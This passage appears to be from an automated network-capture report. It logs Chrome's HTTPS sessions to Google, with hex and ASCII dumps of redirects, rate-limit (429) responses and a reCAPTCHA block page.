2024-05-03 00:07:06 UTC	1255	IN	Data Raw: 61 62 32 0d 0a 4e 48 59 7a 64 47 70 57 5a 55 68 61 4e 46 6b 76 61 44 6c 42 59 55 64 58 62 32 68 53 61 47 39 73 61 6c 5a 47 53 55 31 6f 57 57 45 7a 51 6c 6c 46 4c 32 6c 30 64 6a 6c 4f 63 30 45 32 5a 48 4e 77 65 53 74 31 5a 32 74 79 4f 47 6c 73 65 6b 5a 45 56 48 68 30 53 6b 68 47 56 6b 35 46 62 30 70 47 4b 33 6c 72 4d 7a 41 79 4d 6e 56 51 4d 33 64 78 63 53 39 70 51 6d 74 4f 5a 46 4e 4f 55 6c 4a 61 5a 46 59 31 5a 46 52 75 55 30 56 58 52 55 74 35 65 45 46 4c 52 6e 52 7a 55 57 4a 6c 61 32 52 7a 54 47 56 36 55 58 46 57 5a 55 31 35 62 7a 4d 78 55 54 56 56 56 6c 56 61 63 6e 41 32 52 6c 5a 32 52 58 4e 79 52 6c 46 53 59 6a 46 72 56 32 4e 59 4f 45 31 4d 61 6a 55 79 55 47 35 44 4b 33 49 30 57 57 5a 4e 5a 55 46 68 53 54 42 71 65 6e 6c 36 55 56 63 31 56 56 6b 35 55 56 Data Ascii: ab2NHYzdGpWZUhaNFkvaDlBYUdXb2hSaG9salZGSU1oWWEzQllFL2l0djlOc0E2ZHNweSt1Z2tyOGlsekZEVHh0SkhGVk5Fb0pGK3lrMzAyMnVQM3dxcS9pQmtOZFNOUlJaZFY1ZFRuU0VXRUt5eEFLRnRzUWJla2RzTGV6UXFWZU15bzMxUTVVVlVacnA2RlZ2RXNyRlFSYjFrV2NYOE1MajUyUG5DK3I0WWZNZUFhSTBqenl6UVc1VVk5UV
2024-05-03 00:07:06 UTC	1255	IN	Data Raw: 74 4f 61 55 74 6e 4d 44 64 7a 4d 48 46 31 56 6c 6c 47 5a 31 4e 53 57 55 74 46 52 32 30 78 4f 55 35 6f 64 44 56 48 54 33 52 55 65 45 52 52 65 6c 56 46 4d 55 30 34 5a 47 45 32 64 58 4e 78 5a 32 77 33 5a 47 4a 6a 62 32 4a 4f 4d 46 63 78 61 55 35 33 5a 58 52 79 61 7a 52 70 64 48 68 43 54 6c 42 4a 63 6c 68 79 54 48 4a 4a 63 32 38 77 4d 55 56 68 61 6c 64 77 53 6b 52 48 4d 46 63 31 64 58 68 4b 53 6a 5a 72 4e 7a 4e 33 54 7a 4e 56 4e 44 4a 61 54 32 6f 30 5a 48 70 68 62 33 70 50 62 47 39 4b 4e 54 52 5a 4d 32 4e 47 61 30 78 31 56 30 5a 6e 64 30 52 42 52 48 6c 4d 4d 33 52 7a 52 44 4a 50 54 46 41 30 5a 31 70 4b 56 44 56 51 55 6c 56 46 59 30 5a 47 51 6b 5a 4a 64 57 39 51 54 6b 63 7a 63 57 4e 45 57 55 5a 30 64 48 6c 6b 65 6a 64 6b 63 31 5a 6c 56 44 45 35 54 32 56 4a 59 Data Ascii: tOaUtnMDdzMHF1VllGZ1NSWUtFR20xOU5odDVHT3RUeERRelVFMU04ZGE2dXNxZ2w3ZGJjb2JOMFcxaU53ZXRyazRpdHhCTlBJclhyTHJJc28wMUVhaldwSkRHMFc1dXhKSjZrNzN3TzNVNDJaT2o0ZHphb3pPbG9KNTRZM2NGa0x1V0Znd0RBRHlMM3RzRDJPTFA0Z1pKVDVQUlVFY0ZGQkZJdW9QTkczcWNEWUZ0dHlkejdkc1ZlVDE5T2VJY
2024-05-03 00:07:06 UTC	235	IN	Data Raw: 35 35 34 2c 35 35 33 2c 35 35 32 2c 35 35 31 2c 35 35 30 5d 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 73 75 62 74 79 70 65 73 22 3a 5b 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 5d 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 74 79 70 65 22 3a 5b 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 45 4e 54 49 54 59 22 2c 22 51 55 45 52 59 22 5d 7d 5d 0d 0a Data Ascii: 554,553,552,551,550],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","ENTITY","QUERY"]}]
2024-05-03 00:07:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49707	142.250.176.196	443	2220	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-03 00:07:06 UTC	353	OUT	GET /async/ddljson?async=ntp:2 HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-03 00:07:06 UTC	1304	IN	HTTP/1.1 302 Found Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS_YOPbGKrV0LEGIjDcz2pZmEdzVK_hPLGBgaFyyE5ErvEAAjZRWTB1z5f9ODY2_XD1CrROdDs3EWYLE2syAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM x-hallmonitor-challenge: CgwIqtXQsQYQ0PjGpgMSBL9g49s Content-Type: text/html; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Permissions-Policy: unload=() P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Date: Fri, 03 May 2024 00:07:06 GMT Server: gws Content-Length: 427 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2024-05-03-00; expires=Sun, 02-Jun-2024 00:07:06 GMT; path=/; domain=.google.com; Secure; SameSite=none Set-Cookie: NID=513=DWrJzpeO_AlGQCTXt5ty1WNh0l2OOw8T7oRQ3Zoa1ENiqnIw4bO_2ZcuFq9VvWqvNWsqP8v9ZDDjNYXb7nI01d9lSeJ8o1-eiHPx4qtapTB1zpdokVX88VOxuJ34zOMl-eiLDJV3ZwM2XERaxlXhDhadtkAAVv1x7Wcfltl3xRk; expires=Sat, 02-Nov-2024 00:07:06 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-05-03 00:07:06 UTC	427	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 64 64 6c 6a 73 6f 6e 25 33 46 61 73 79 6e Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasyn

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49710	142.250.176.196	443	2220	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-03 00:07:06 UTC	518	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-03 00:07:07 UTC	1330	IN	HTTP/1.1 302 Found Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YOPbGKrV0LEGIjCEBr3ti8UCkjxZ8z1bhLV56wHmRrKhu4Vx7PJg1CB49b8tfAh4AUocopkgP0IK5pYyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM x-hallmonitor-challenge: CgsIq9XQsQYQ48T2KRIEv2Dj2w Content-Type: text/html; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Permissions-Policy: unload=() P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Date: Fri, 03 May 2024 00:07:07 GMT Server: gws Content-Length: 458 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2024-05-03-00; expires=Sun, 02-Jun-2024 00:07:07 GMT; path=/; domain=.google.com; Secure; SameSite=none Set-Cookie: NID=513=WCt0m2IY6-XwivBAmcSfqLq9ED-NKpUBmsK_eqjaiJ4U0I64v8yMvtJhBFx3-k8CDGXp6aJr1OuMvuf-TGgQ7NDfE9JAMUgh0kmH9V0PntfGpQ0AioP_qVIxiA_qn-BFOwJVLhWrkm1ZR8rK9Dg1rDT2lDgW-86owYUYlk_lfjc; expires=Sat, 02-Nov-2024 00:07:06 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-05-03 00:07:07 UTC	458	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 25 33 46 68 Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fh

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49711	142.250.176.196	443	2220	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-03 00:07:06 UTC	353	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-03 00:07:06 UTC	1249	IN	HTTP/1.1 302 Found Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YOPbGKrV0LEGIjBS7GnGmqaZ9EWfyRGfksWN7UDK3EXq_-bjwYmJEf0C5nRkSFOpXYOxhCcsjI-KqzoyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM x-hallmonitor-challenge: CgwIqtXQsQYQiZjbnwMSBL9g49s Content-Type: text/html; charset=UTF-8 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Permissions-Policy: unload=() P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Date: Fri, 03 May 2024 00:07:06 GMT Server: gws Content-Length: 417 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2024-05-03-00; expires=Sun, 02-Jun-2024 00:07:06 GMT; path=/; domain=.google.com; Secure; SameSite=none Set-Cookie: NID=513=MPqY36XyGj-JONN2Z87PdlDzgAEtcj-pLAgX_c2kDcpmGgVYzrrr9o7WFJMlqbf5SJDjpW0Ch7bkmUuZjsXEYOtIKCBbs3J2imxo2hiT-FMuPlcCn3tHwZlU3663cv2u4s5GjuKvzwszdssnLXqwFDqjoVfF7bxsfGTgbm-2c4c; expires=Sat, 02-Nov-2024 00:07:06 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-05-03 00:07:06 UTC	6	IN	Data Raw: 3c 48 54 4d 4c 3e Data Ascii: <HTML>
2024-05-03 00:07:06 UTC	411	IN	Data Raw: 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 26 61 6d 70 3b 71 3d Data Ascii: <HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49714	142.250.176.196	443	2220	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-03 00:07:08 UTC	738	OUT	GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YOPbGKrV0LEGIjBS7GnGmqaZ9EWfyRGfksWN7UDK3EXq_-bjwYmJEf0C5nRkSFOpXYOxhCcsjI-KqzoyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: 1P_JAR=2024-05-03-00; NID=513=WCt0m2IY6-XwivBAmcSfqLq9ED-NKpUBmsK_eqjaiJ4U0I64v8yMvtJhBFx3-k8CDGXp6aJr1OuMvuf-TGgQ7NDfE9JAMUgh0kmH9V0PntfGpQ0AioP_qVIxiA_qn-BFOwJVLhWrkm1ZR8rK9Dg1rDT2lDgW-86owYUYlk_lfjc
2024-05-03 00:07:08 UTC	356	IN	HTTP/1.1 429 Too Many Requests Date: Fri, 03 May 2024 00:07:08 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html Server: HTTP server (unknown) Content-Length: 3113 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-05-03 00:07:08 UTC	899	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_promos</title></head
2024-05-03 00:07:08 UTC	1255	IN	Data Raw: 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 79 4a 6e 54 31 61 49 4b 76 78 76 4c 72 76 6a 64 63 36 73 33 31 4b 55 39 5f 33 48 65 55 30 30 56 48 Data Ascii: ack = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="yJnT1aIKvxvLrvjdc6s31KU9_3HeU00VH
2024-05-03 00:07:08 UTC	959	IN	Data Raw: 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 65 72 20 74 68 6f 73 65 20 72 65 71 75 65 73 74 73 20 73 74 6f 70 2e 20 20 49 6e 20 74 68 65 20 6d 65 61 6e 74 69 6d 65 2c 20 73 6f 6c 76 69 6e Data Ascii: ogle automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly after those requests stop. In the meantime, solvin

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49715	142.250.176.196	443	2220	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-03 00:07:08 UTC	920	OUT	GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YOPbGKrV0LEGIjCEBr3ti8UCkjxZ8z1bhLV56wHmRrKhu4Vx7PJg1CB49b8tfAh4AUocopkgP0IK5pYyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: 1P_JAR=2024-05-03-00; NID=513=WCt0m2IY6-XwivBAmcSfqLq9ED-NKpUBmsK_eqjaiJ4U0I64v8yMvtJhBFx3-k8CDGXp6aJr1OuMvuf-TGgQ7NDfE9JAMUgh0kmH9V0PntfGpQ0AioP_qVIxiA_qn-BFOwJVLhWrkm1ZR8rK9Dg1rDT2lDgW-86owYUYlk_lfjc
2024-05-03 00:07:08 UTC	356	IN	HTTP/1.1 429 Too Many Requests Date: Fri, 03 May 2024 00:07:08 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html Server: HTTP server (unknown) Content-Length: 3185 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-05-03 00:07:08 UTC	899	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 3f 68 6c 3d 65 6e 2d 55 53 26 61 6d 70 3b 61 73 79 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_ogb?hl=en-US&asy
2024-05-03 00:07:08 UTC	1255	IN	Data Raw: 0a 3c 73 63 72 69 70 74 3e 76 61 72 20 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 67 4a 51 6b 65 45 4e 76 75 Data Ascii: <script>var submitCallback = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="gJQkeENvu
2024-05-03 00:07:08 UTC	1031	IN	Data Raw: 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 22 3e 0a 54 68 69 73 20 70 61 67 65 20 61 70 70 65 61 72 73 20 77 68 65 6e 20 47 6f 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 Data Ascii: ; line-height:1.4em;">This page appears when Google automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly aft

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49719	23.199.50.2	443

Timestamp	Bytes transferred	Direction	Data
